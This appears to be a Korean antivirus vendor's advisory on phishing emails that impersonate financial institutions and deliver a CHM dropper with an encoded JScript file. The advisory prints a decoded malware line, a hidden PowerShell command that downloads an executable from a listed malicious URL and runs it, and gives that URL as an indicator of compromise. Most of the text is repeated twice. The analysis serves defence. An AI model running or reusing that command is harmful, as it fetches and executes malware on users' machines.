금융기관을 사칭하는 피싱 메일 주의
Contents
□ 개요
금융기관을 사칭하는 메일이 배포되고 있어 주의를 요하고 있다.
□ 내용
해당 피싱 메일은 금융기관을 사칭하고 있으며 ‘상품 계약서’, ‘보험료 자동이체 출금결과 안내’, ‘카드이용한도 조정안내’, ‘세금계산서’ 등으로 수신인으로 하여금 첨부파일의 실행을 유도한다. 금전적인 부분은 중요한 부분이기 때문에 의심 없이 실행할 가능성이 높다.
금융기관을 사칭하는 악성 코드는 Chm 파일로 배포하고 있으며, 압축을 해제하면 HTML파일과 인코딩된 Docs.jse 파일을 확인 할 수 있다.
동일한 금융 기관으로 사칭하기 위해 정상 HTML 아래에 스크립트가 삽입되어 있는 형태이며, Docs.jse파일을 숨기기 위해 CHM파일을 디코딩하여 공용 라이브러리에 숨긴다. 그리고 Docs.jse 파일을 wscript 로 실행시킨다.
jse파일을 복호화 한 코드이다.
악성 코드를 지속적으로 실행시키기 위해 부팅 시 자동 실행이 되도록 jse파일을 레지스트리에 등록하며, powershell 명령어를 통해 악성 사이트에 접속하여 추가 악성 코드를 다운 받도록 만들어져 있다.
w.run("cmd /c powershell iwr -outf %tmp%alg.exe https://drimby.top/wndfi & start %tmp%alg.exe", 0, false)
□ 바이로봇 업데이트 내역
- CHM.S.Dropper
- HTML.S.CHMPhishing
- HTML.S.Phishing
Top
금융기관을 사칭하는 메일이 배포되고 있어 주의를 요하고 있다.
□ 내용
해당 피싱 메일은 금융기관을 사칭하고 있으며 ‘상품 계약서’, ‘보험료 자동이체 출금결과 안내’, ‘카드이용한도 조정안내’, ‘세금계산서’ 등으로 수신인으로 하여금 첨부파일의 실행을 유도한다. 금전적인 부분은 중요한 부분이기 때문에 의심 없이 실행할 가능성이 높다.
금융기관을 사칭하는 악성 코드는 Chm 파일로 배포하고 있으며, 압축을 해제하면 HTML파일과 인코딩된 Docs.jse 파일을 확인 할 수 있다.
동일한 금융 기관으로 사칭하기 위해 정상 HTML 아래에 스크립트가 삽입되어 있는 형태이며, Docs.jse파일을 숨기기 위해 CHM파일을 디코딩하여 공용 라이브러리에 숨긴다. 그리고 Docs.jse 파일을 wscript 로 실행시킨다.
jse파일을 복호화 한 코드이다.
악성 코드를 지속적으로 실행시키기 위해 부팅 시 자동 실행이 되도록 jse파일을 레지스트리에 등록하며, powershell 명령어를 통해 악성 사이트에 접속하여 추가 악성 코드를 다운 받도록 만들어져 있다.
w.run("cmd /c powershell iwr -outf %tmp%alg.exe https://drimby.top/wndfi & start %tmp%alg.exe", 0, false)
□ 바이로봇 업데이트 내역
- CHM.S.Dropper
- HTML.S.CHMPhishing
- HTML.S.Phishing
Top
IoC
https://drimby.top/wndfi